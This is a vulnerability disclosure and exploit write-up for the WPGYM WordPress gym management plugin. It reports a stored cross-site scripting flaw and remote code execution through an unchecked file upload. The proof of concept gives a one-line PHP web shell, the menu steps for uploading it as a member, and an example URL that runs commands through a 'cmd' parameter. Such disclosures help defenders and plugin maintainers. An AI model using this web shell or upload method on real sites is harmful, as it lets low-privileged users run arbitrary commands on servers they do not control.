WordPress Gym Management System 07-05-2017 Code Execution / Cross Site Scripting

`# Exploit Title: WPGYM - Wordpress Gym Management System <= 07-05-2017 - Remote Code Execution / Stored XSS  
# Date: 2017-07-25  
# Exploit Author: 8bitsec  
# Vendor Homepage: http://www.mobilewebs.net/  
# Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964  
# Version: ?  
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]  
# Email: [email protected]  
# Contact: https://twitter.com/_8bitsec  
  
Release Date:  
=============  
2017-07-25  
  
Product & Service Introduction:  
===============================  
WPGYM a Wordpress Gym Management System ideal Wordpress plugin for your Wordpress powered gym management system.  
The plugin is not version numbered, it was tested on version 07-05-2017.  
  
Technical Details & Description:  
================================  
  
Authenticated Stored XSS vulnerability found on Account section.  
  
Remote Code Execution via Arbitrary File Upload.  
  
All vulnerabilities tested as a low priv user (member).  
  
Proof of Concept (PoC):  
=======================  
  
Remote Code Execution  
  
shell.png.php:  
<?php echo shell_exec($_GET['cmd']);?>  
  
Member > View > Add weight > Upload image > shell.png.php > Save Measurement  
An alert will warn you about incorrect file type but it will still upload it.  
  
Go to Workouts > View Measurement > Right Click on Image > View Image or Copy Image URL  
Paste on your browser and add ?cmd=[command]  
  
Example:  
https://localhost/wordpress/gym/wp-content/uploads/gym_assets/1501018920-pimg-in.php?cmd=id  
  
Authenticated Stored XSS:  
  
Account > Home Town Address textfield is vulnerable.  
  
==================  
8bitsec - [https://twitter.com/_8bitsec]  
`